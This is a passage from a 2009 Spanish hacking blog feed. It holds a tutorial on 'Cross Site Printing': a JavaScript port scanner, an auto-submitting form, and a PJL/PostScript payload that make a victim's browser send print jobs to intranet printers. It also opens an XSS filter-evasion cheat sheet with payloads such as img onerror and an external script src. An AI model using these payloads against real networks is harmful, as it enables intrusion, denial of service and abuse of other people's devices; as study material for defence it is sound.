nuestra intranet. No es un tema transcendental ni&lt;br /&gt;mucho menos, pero para mí es algo que me resulta bastante curioso y que está poco&lt;br /&gt;documentado en castellano.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Realmente el impacto no lo considero grave ni mucho menos, bueno quizás en el&lt;br /&gt;caso de mandar FAXs el impacto puede ser económico… y alguna denegación de&lt;br /&gt;servicio también se puede lograr… pero salvo estos casos, en general sólo sirve para&lt;br /&gt;imprimir documentos en redes ajenas (un poquito de SPAM ).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El Cross Site Printing no es más que una variante del Cross Site Scripting (XSS) de&lt;br /&gt;toda la vida, consistente en que al visitar una web, ésta contiene un código JavaScript&lt;br /&gt;que enviará una petición a la impresora donde mediante código PostScript podremos&lt;br /&gt;llegar hasta a “dibujar”. Auqnue no sólo con JavaScript, ya que podemos variar el&lt;br /&gt;ataque y convertirlo en uno usando las CSS (CSS Attack), cosa que ya veremos en su&lt;br /&gt;apartado.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sobre la vulnerabilidad, decir que surge por una falta de previsión por parte de&lt;br /&gt;los fabricantes, los cuales no han pensado la posibilidad de colocar autentificaciones u&lt;br /&gt;algún otro sistema de identifiación, o de filtro de seguridad para evitar esto. He de decir,&lt;br /&gt;que en los últimos años según he estado leyendo recientemente, esto ya no es así, sino&lt;br /&gt;que algunos sistemas ya incorporan medidas de seguridad básicas… pero como casi&lt;br /&gt;todo hoy en día, tienen fallos aprovechables (podeis hechar un ojo poralgún bugtraq&lt;br /&gt;para ver algunas vulnes en impresoras).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./0x01 Conceptos básicos&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Antes de poder meternos a fondo con el tema, necesitamos conocer ciertos&lt;br /&gt;conceptos básicos para poder entender más adelante todo lo que vamos a decir. Para&lt;br /&gt;empezar… ¿de qué forma saben las impresoras cómo es la descripción de la página&lt;br /&gt;que han de escribir?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Para responder a esto, debemos de saber qué son los lenguajes de descripción&lt;br /&gt;de páginas. Los PDL (Page Description Language) son los encargados de describir la&lt;br /&gt;maquetación del texto, la disposición de elementos gráficos como objetos vectoriales o&lt;br /&gt;mapas de bits, el formato de las páginas, etc… Podemos encontrar diferentes PDLs&lt;br /&gt;dependiendo de la empresa fabricante de la impresora, así encontramos por ejemplo&lt;br /&gt;que HP usa PCL (Printer Command Language, es muy común confundir estas siglas con&lt;br /&gt;las de Printer Control Languages, siendo este último un sinónimo de PDL), Epson usa&lt;br /&gt;ESC/P (Epson Standar Code for Printers) y ESC/P2 (versión mejorada del anterior),&lt;br /&gt;Samsung tiene el SPL (Samsung Printer Language), y por último nombrar a Adobe y su&lt;br /&gt;PostScript. Estos son los más importantes, puesto que hay muchos más.&lt;br /&gt;De los PDL que hemos mencionado, nosotros nos vamos a central sobre todo en&lt;br /&gt;PCL y PostScript, puesto que son los que mayor transcendencia han tenido. De ambos&lt;br /&gt;lenguajes hablaremos más adelante con algo más de detalle, por ahora sólo hacer un&lt;br /&gt;par de apuntes interesantes.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sobre PostScript, decir que fue de los primeros en ser un&lt;br /&gt;lenguaje de programación en sí, es decir, marca la diferencia con los demás sistemas de&lt;br /&gt;descripción de la época, los cuales se basaban en secuencias de caracteres de escape.&lt;br /&gt;También decir que implementó la composición de imágenes a través de líneas&lt;br /&gt;horizontales y curvas, nubes de píxeles y distintos tipos de tipografía. El formato PDF&lt;br /&gt;(Portable Document Format) es un derivado de PostScript.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Para terminar de hablar de los PDLs, hablaremos de PCL. El PCL introducido por&lt;br /&gt;HP ha sido uno implementado por un gran número de fabricantes, por ello va ha ser&lt;br /&gt;sobre el que trabajemos. Los comandos de PCL son secuencias iniciadas por algún&lt;br /&gt;carácter de escape.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora toca hablar sobre los protocolos que usan las impresoras en red.&lt;br /&gt;Bien, vamos a hablar a grandes rasgos (puesto que en materia de protocolos sólo sé&lt;br /&gt;aquello que me ha ido haciendo falta) de los protocolos que suelen usar las impresoras.&lt;br /&gt;El primero es el LPD (Line Printer Daemon) y trabaja por el puerto 515.&lt;br /&gt;Después tenemos el IPP (Internet Printing Protocol) que está basado en el&lt;br /&gt;protocolo IP ,y construido sobre HTTP, permite la autentificación y el cifrado. Este&lt;br /&gt;protocolo envía una mayor cantidad de datos relacionados con el trabajo que otros&lt;br /&gt;protocolos. Utiliza el puerto 631.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El protocolo de recursos compartidos CIFS (Common Internet File System),&lt;br /&gt;anteriormente conocido como SMB (Server Message Block), también puede ser utilizado&lt;br /&gt;para la comunicación con impresoras dentro de una red. Este protocolo es empleado&lt;br /&gt;principalmente por Microsoft, aunque exite una implementación libre del protocolo&lt;br /&gt;llamada Samba que permite su utilización en sistemas operativos GNU/Linux. Los&lt;br /&gt;puertos que puede emplear son 137, 138 y 139.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Y por último, sobre el que vamos a hablar en el paper, es el protocolo&lt;br /&gt;Raw TCP/IP, el cual trabaja por el puerto 9100.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./0x02 Buscando Impresoras&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Como ya hemos dicho, nosotros nos vamos a centrar en los ataques a&lt;br /&gt;través del protocolo Raw. Para realizar una búsqueda de impresoras dentro de nuestra&lt;br /&gt;intranet, o bien queremos hacerla hacia redes remotas (si estan mal configurada&lt;br /&gt;podemos acceder a las impresoras) tenemos varias opciones. La opción A es codearnos&lt;br /&gt;un programa sencillo en nuestro lenguaje preferido (en mi caso PERL) y lanzar sockets a&lt;br /&gt;direcciones IPs internas o hacer una búsqueda masiva. En cualquiera de los casos lo que&lt;br /&gt;debemos de hacer es tratar de ver si tiene el puerto 9100 abierto. En caso afirmativo&lt;br /&gt;hemos encontrado una impresora sobre la que trabajar.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Pero en este caso no estaríamos explotando ninguna vulnerabilidad ni&lt;br /&gt;nada similar… y sería aburrido. Recientemente he estado leyendo acerca de los&lt;br /&gt;Scanners de puertos en JavaScript y en CSS. Como ya dije al principio, el Cross Site&lt;br /&gt;Printing es una vulnerabilidad derivada de los XSS’s. Luego si un usuario visita una web&lt;br /&gt;vulnerable a XSS, y en el código malicioso incluimos el PortScanner, podremos saber la&lt;br /&gt;direcciones de las impresoras que hay en su red, y ahí atacar. Este pequeño concepto lo&lt;br /&gt;he sacado a partir de una idea que teníamos en mente S e t h y yo sobre analisis de&lt;br /&gt;intranets desde el exterior para combinarlo con Malwares contra routers… pero el&lt;br /&gt;concepto es portable a otros escenarios como es este.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Aquí os dejo un ejemplo de un PortScanner en JavaScript:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;var AttackAPI = {&lt;br /&gt;version: '0.1',&lt;br /&gt;author: 'Petko Petkov (architect)',&lt;br /&gt;homepage: 'http://www.gnucitizen.org'};&lt;br /&gt;AttackAPI.PortScanner = {};&lt;br /&gt;AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout)&lt;br /&gt;{&lt;br /&gt;var timeout = (timeout == null)?100:timeout;&lt;br /&gt;var img = new Image();&lt;br /&gt;img.onerror = function () {&lt;br /&gt;if (!img) return;&lt;br /&gt;img = undefined;&lt;br /&gt;callback(target, port, 'open');&lt;br /&gt;};&lt;br /&gt;img.onload = img.onerror;&lt;br /&gt;img.src = 'http://' + target + ':' + port;&lt;br /&gt;setTimeout(function () {&lt;br /&gt;if (!img) return;&lt;br /&gt;img = undefined;&lt;br /&gt;callback(target, port, 'closed');&lt;br /&gt;}, timeout);&lt;br /&gt;};&lt;br /&gt;AttackAPI.PortScanner.scanTarget = function (callback, target, ports,&lt;br /&gt;timeout)&lt;br /&gt;{&lt;br /&gt;for (index = 0; index &amp;lt; ports.length; index++)&lt;br /&gt;AttackAPI.PortScanner.scanPort(callback, target,&lt;br /&gt;ports[index], timeout);&lt;br /&gt;};&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;Mis conocimientos en JavaScript rozan casi la nulidad, por ello no he&lt;br /&gt;podido modificar este script para que busque impresoras en nuestra red, pero sí que&lt;br /&gt;tengo la idea de cómo se haría (me faltan los conocimientos sobre el lenguaje para&lt;br /&gt;poder expresarlas). La cosa sería crear unos bucles FOR que fueran creando diferentes&lt;br /&gt;IPs posibles incrementandolas (las que equivaldrían al Target) para que den lugar a las&lt;br /&gt;diferentes IPs de nuestra red (192.168.1.1, 192.168.1.2 y así sucesivamente) y aplicarle&lt;br /&gt;la función de escaneo a esas IPs, pero haciendo que únicamente revise el puerto 9100.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Si alguien logra crear un scanner basandose en estas indicaciones, por&lt;br /&gt;favor envíadmelo para incluirlo en esta publicación.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./0x03 El arte del Ascii&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ya sabemos cómo encontrar impresoras en nuestra red y en ajenas, y&lt;br /&gt;además a través de que puerto vamos a trabajar. Ahora toca hablar sobre el “trabajo en&lt;br /&gt;sí”.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Para comunicarnos con la impresora, y que ésta imprima debemos de&lt;br /&gt;hacer una conexión a ésta a través del puerto 9100. Esta conexión podemos establecerla&lt;br /&gt;de multiples maneras, como por ejemplo a través de NetCat, Telnet, Putty o algún otro&lt;br /&gt;sistema que permita negociaciones de este tipo. Pero, como nosotros queremos&lt;br /&gt;enfocarlo hacia el ataque desde una web, usarermos para la conexión nuestro&lt;br /&gt;navegador. Para ello, entremos a la URI http://IPdeTuImpresora:9100. Al añadir los : y el&lt;br /&gt;número, indicamos a nuestro navegador que se conecte a través del puerto que&lt;br /&gt;queramos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Si todo ha salido bien, no debería de cargarte ninguna web, es decir,&lt;br /&gt;verías todo en blanco… y en la impresora algo recién impreso: la cabecera HTTP que&lt;br /&gt;enviástes. Ahora observar qué ocurre si mandais una petición tipo POST con por ejemplo&lt;br /&gt;la siguiente frase: “Lutscher si estás leyendo esto… vuelve con nosotros!!!!” usando&lt;br /&gt;Live HTTP Headers. La frase aparece impresa sí, pero se encuentra bajo URLEncoded, lo&lt;br /&gt;que podría no ser un texto legible con facilidad.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bien, volvamos al ejemplo de que tenemos cierta web vulnerable a XSS y&lt;br /&gt;combinando el scanner en JavaScript y añadiendo un formulario hidden que contenga&lt;br /&gt;nuestra frase, y haciendo que este se autosubmitee para que se mande a nuestra&lt;br /&gt;impresora (que sabremos por el scanner), podríamos hacer un poco de SPAM. Pero si realmente queremos mandar un mensaje o un dibujo en ASCII, el URLencode resulta&lt;br /&gt;engorroso. Esto podemos solventarlo si el formulario lo dejamos de esta forma:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;&amp;lt;FORM ACTION='HTTP://YOURPRINTER:9100' NAME=”IMPRESORA”&lt;br /&gt;ENCTYPE='MULTIPART/FORM-DATA' METHOD='POST'&gt;&lt;br /&gt;&amp;lt;input type=”hidden” value=”Estas siendo Spammeado :O”&gt;&lt;br /&gt;&amp;lt;/FORM&gt;&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;A esto le añadimos la función de auto envío y ya. Aquí juega un papel&lt;br /&gt;importante podríamos decir el dibujar en ASCII para poder dar cierta mejor calidad a&lt;br /&gt;nuestro texto (añadir dibujos y esas cosas).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./0x04 PostScript: Controlando la Impresión&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Al inicio del paper ya estuvimos hablando sobre los lenguajes PDL y dijimos que&lt;br /&gt;nosotros ibamos a usar PCL y PostScript para controlar diversas funciones. En este&lt;br /&gt;apartado, vamos a conocer nociones muy básicas de Post Script (para aprender más&lt;br /&gt;buscad algún manual) y cómo encapsularlo dentro de PCL.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Empecemos viendo como son los comandos en PS (a partir de ahora lo usaremos&lt;br /&gt;como abreviatura). A diferencia de los lenguajes que todos conocemos, en PS los&lt;br /&gt;parámetros de los comandos han de introducirse antes que el comando, por ejemplo:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;100 300 moveto&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;En este caso, moveto es el comando y sus parámetros son 100 y 300. Este&lt;br /&gt;comando sirve para mover el cursor hasta el punto de inicio del dibujo. Los dos valores&lt;br /&gt;que se indican antes hacen referencia a las coordenadas (utilizando como referencia&lt;br /&gt;píxeles, cosa que podemos modificar con otros comandos al igual que el tamaño del&lt;br /&gt;papel) x e y.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Como todos sabemos desde la primaria, para dibujar una línea recta necesitamos&lt;br /&gt;dos puntos, y si ya tenemos uno ahora nos hace falta el punto final. Para ello usaremos&lt;br /&gt;lineto, cuya sintaxis es la misma que la de moveto:&lt;br /&gt;&lt;br /&gt;300 360 lineto&lt;br /&gt;&lt;br /&gt;Donde el primer valor indica las coordenadas en el eje X y el segundo en el eje Y.&lt;br /&gt;Pero no solo necesitamos esto antes de hacer una línea, sino que debemos de indicar el&lt;br /&gt;inicio de que se va a dibujar una línea con el comando newpath y el final con stroke. Con&lt;br /&gt;esta información ya podemos empezar a dibujar figuras rectilíneas simples:&lt;br /&gt;&lt;br /&gt;newpath&lt;br /&gt;150 150 moveto&lt;br /&gt;350 150 lineto&lt;br /&gt;350 300 lineto&lt;br /&gt;150 300 lineto&lt;br /&gt;150 150 lineto&lt;br /&gt;stroke&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Aquí ya tendríamos un rectángulo. Exsiten múltiples programas que&lt;br /&gt;sirven para representar en pantalla el dibujo, de esta forma podremos trabajar mejor.&lt;br /&gt;Para indicar el ancho de línea con la que queremos que se realice nuestro&lt;br /&gt;dibujo, emplearemos el comando setlinewidth:&lt;br /&gt;&lt;br /&gt;X setlinewidth&lt;br /&gt;&lt;br /&gt;Siendo X el grosor de la línea indicado en píxeles.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;También podemos controlar la tipología con la que escribimos. Por&lt;br /&gt;ejemplo, para seleccionar un determinado tipo de fuente no tenemos nada más que&lt;br /&gt;escribir /nombredelafuente findfont . Despues seleccionamos el tamaño con scalefont (x&lt;br /&gt;scalefont), setear la fuente para usarla con setfont y por último escribirla y mandarla&lt;br /&gt;con show. En resumen:&lt;br /&gt;&lt;br /&gt;/Times-Roman findfont&lt;br /&gt;50 scalefont&lt;br /&gt;Setfont&lt;br /&gt;100 300 moveto&lt;br /&gt;(Overload In The Net RoolZ!!) show&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Por ultimo, para realizar la impresión sólo tendremos que finalizar con&lt;br /&gt;showpage.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Son muchos los comandos y las posiblidades (desde trazar curvas, unir&lt;br /&gt;puntos con curvas, usar colores, mapas de bits, etc…) y no es el objetivo de este&lt;br /&gt;documento centrarse en esto. Simplemten pongo algunos casos sencillos para que&lt;br /&gt;entendais más o menos lo básico de este lenguaje. Existen programas que convierten&lt;br /&gt;webs enteras a PS, lo cual nos facilitaría enormemente el trabajo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Para encapsular un código PS dentro de PCL para que sea ejecutado por la&lt;br /&gt;mayoría de las impresoras, simplemente tenemos que inicialmente indicar qué lenguaje&lt;br /&gt;vamos a usar usando para ello la siguiente directiva:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;%-12345X@PJL ENTER LANGUAGE = POSTSCRIPT&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Y para indicar hasta donde termina el código, usaremos %-12345X. Y&lt;br /&gt;como último detalle decir que al inicio del código PS tenemos que poner antes del primer&lt;br /&gt;comando %!PS.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Si todo esto lo unimos a JavaScript, tenemos la forma perfecta de&lt;br /&gt;controlar la impresión. Aquí os dejo un pequeño ejemplo que he encontrado al consultar&lt;br /&gt;un pequeño paper de Aaron Weaver&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;var msg=String.fromCharCode(27)&lt;br /&gt;+ "%-12345X@PJL ENTER LANGUAGE = POSTSCRIPT\r\n”&lt;br /&gt;+ "%!PS\r\n"&lt;br /&gt;+ "/Courier findfont\r\n"&lt;br /&gt;+ "20 scalefont\r\n"&lt;br /&gt;+ "setfont\r\n"&lt;br /&gt;+ "72 500 moveto\r\n"&lt;br /&gt;+ "(Your printer is mine!) show\r\n"&lt;br /&gt;+ "showpage\r\n"&lt;br /&gt;+ String.fromCharCode(27)&lt;br /&gt;+ "%-12345X”&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;./0x05 Conclusión&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Para concluir simplemente decir que proteger las impresoras con passwords u&lt;br /&gt;otros sitemas es algo bastante importante, ya que pese que aquí hemos visto&lt;br /&gt;únicamente como imprimir en casa a ajena usando para ello una web vulnerable a XSS y&lt;br /&gt;un poquito de JavaScript, el impacto puede llegar a ser bastante mayor. Por ejemplo, se&lt;br /&gt;podría llegar a causar denegaciones de servicio en la impresora, y en toda la red.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;A parte de esto, hay que tener mucho cuidado a la hora de las configuraciones,&lt;br /&gt;para evitar que personas ajenas a la red puedan ejecutar acciones sobre ella, tal y como&lt;br /&gt;hemos visto.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Para contacto: Camaleon__81 -at- Hotmail -dot- com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-7171754811602456864?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~f/0v3rl04d1nTh3N3t?a=lLsp52lj"&gt;&lt;img src="http://feeds.feedburner.com/~f/0v3rl04d1nTh3N3t?d=41" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/PQh4u6YaKEo" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-02-24T00:05:03.693+01:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><media:content url="http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~5/TQDFP48Zcfo/294" fileSize="61253" type="application/pdf" /><itunes:explicit>no</itunes:explicit><itunes:subtitle>code{ color: lime;}Recien acabo de terminar este pequeño paper. Estoy esperando a que alguien le haga un mirror (tengo por ahí el PDF, si alguien quiere subirlo avisadme). Edito: he subido el paper a milw0rm- Cross Site Printing ==========================</itunes:subtitle><itunes:author>Copyright: "Vengador de las Sombras"</itunes:author><itunes:summary>code{ color: lime;}Recien acabo de terminar este pequeño paper. Estoy esperando a que alguien le haga un mirror (tengo por ahí el PDF, si alguien quiere subirlo avisadme). Edito: he subido el paper a milw0rm- Cross Site Printing ============================================================== ./0x00 Introducción al tema ./0x01 Conceptos básicos ./0x02 Buscando impresoras ./0x03 El arte del ASCII ./0x04 PostScript: controlando la impresión ./0x05 Conclusión ./0x00 Introducción al tema El tema que venimos a tratar en este pequeño paper es la posibilidad desde el exterior (véase desde una web, por ejemplo) realizar un “ataque” (entrecomillémoslo) hacia las impresoras que tenemos en nuestra intranet. No es un tema transcendental ni mucho menos, pero para mí es algo que me resulta bastante curioso y que está poco documentado en castellano. Realmente el impacto no lo considero grave ni mucho menos, bueno quizás en el caso de mandar FAXs el impacto puede ser económico… y alguna denegación de servicio también se puede lograr… pero salvo estos casos, en general sólo sirve para imprimir documentos en redes ajenas (un poquito de SPAM ). El Cross Site Printing no es más que una variante del Cross Site Scripting (XSS) de toda la vida, consistente en que al visitar una web, ésta contiene un código JavaScript que enviará una petición a la impresora donde mediante código PostScript podremos llegar hasta a “dibujar”. Auqnue no sólo con JavaScript, ya que podemos variar el ataque y convertirlo en uno usando las CSS (CSS Attack), cosa que ya veremos en su apartado. Sobre la vulnerabilidad, decir que surge por una falta de previsión por parte de los fabricantes, los cuales no han pensado la posibilidad de colocar autentificaciones u algún otro sistema de identifiación, o de filtro de seguridad para evitar esto. He de decir, que en los últimos años según he estado leyendo recientemente, esto ya no es así, sino que algunos sistemas ya incorporan medidas de seguridad básicas… pero como casi todo hoy en día, tienen fallos aprovechables (podeis hechar un ojo poralgún bugtraq para ver algunas vulnes en impresoras). ./0x01 Conceptos básicos Antes de poder meternos a fondo con el tema, necesitamos conocer ciertos conceptos básicos para poder entender más adelante todo lo que vamos a decir. Para empezar… ¿de qué forma saben las impresoras cómo es la descripción de la página que han de escribir? Para responder a esto, debemos de saber qué son los lenguajes de descripción de páginas. Los PDL (Page Description Language) son los encargados de describir la maquetación del texto, la disposición de elementos gráficos como objetos vectoriales o mapas de bits, el formato de las páginas, etc… Podemos encontrar diferentes PDLs dependiendo de la empresa fabricante de la impresora, así encontramos por ejemplo que HP usa PCL (Printer Command Language, es muy común confundir estas siglas con las de Printer Control Languages, siendo este último un sinónimo de PDL), Epson usa ESC/P (Epson Standar Code for Printers) y ESC/P2 (versión mejorada del anterior), Samsung tiene el SPL (Samsung Printer Language), y por último nombrar a Adobe y su PostScript. Estos son los más importantes, puesto que hay muchos más. De los PDL que hemos mencionado, nosotros nos vamos a central sobre todo en PCL y PostScript, puesto que son los que mayor transcendencia han tenido. De ambos lenguajes hablaremos más adelante con algo más de detalle, por ahora sólo hacer un par de apuntes interesantes. Sobre PostScript, decir que fue de los primeros en ser un lenguaje de programación en sí, es decir, marca la diferencia con los demás sistemas de descripción de la época, los cuales se basaban en secuencias de caracteres de escape. También decir que implementó la composición de imágenes a través de líneas horizontales y curvas, nubes de píxeles y distintos tipos de tipografía. El formato PDF (Portable Document Format) es un derivado de PostScript. Para terminar de hablar de los PDLs, hablaremos de PCL. El </itunes:summary><itunes:keywords>Hack,hacking,hackers</itunes:keywords><category domain="http://rss.financialcontent.com/stocksymbol">XSS</category><feedburner:origLink>http://0verl0ad.blogspot.com/2009/02/xsp-cross-site-printing.html</feedburner:origLink><enclosure url="http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~5/TQDFP48Zcfo/294" length="61253" type="application/pdf" /><feedburner:origEnclosureLink>http://www.milw0rm.com/papers/294</feedburner:origEnclosureLink></item><item><title>XSS CheatSheet</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/m_rN3vHHVi4/xss-cheatsheet.html</link><category>CheatSheet</category><category>XSS</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Thu, 19 Feb 2009 18:22:00 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-7500785082914717119</guid><description>Aqui os dejo esta pequeña "Chuleta" sobre XSS. Yo recomiendo guardarla en marcadores por si alguna vez os hace falta :P. La cosa es que quería postearla de tal forma que puedieramos buscar el tipo de filtro en ella... haber que tal os parece.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;-Bloqueo del Número máximo de caracteres&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;Hacer Form Tampering o modificar el header&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;-Codigo se queda en un value=""&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;Poner un "&gt; u otro elemento de clausura que nos deje salirnos &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;-Magic Quotes activadas (imposibilidad de poner comillas)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;Poner el código .js en un host externo y hacer &amp;lt;script src=tuhost&gt;&amp;lt;/script&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;-Te impide poner / para cerrar un tag&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-style: italic;"&gt;&amp;lt;img src=. onerror=alert(/XSSed/)&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: 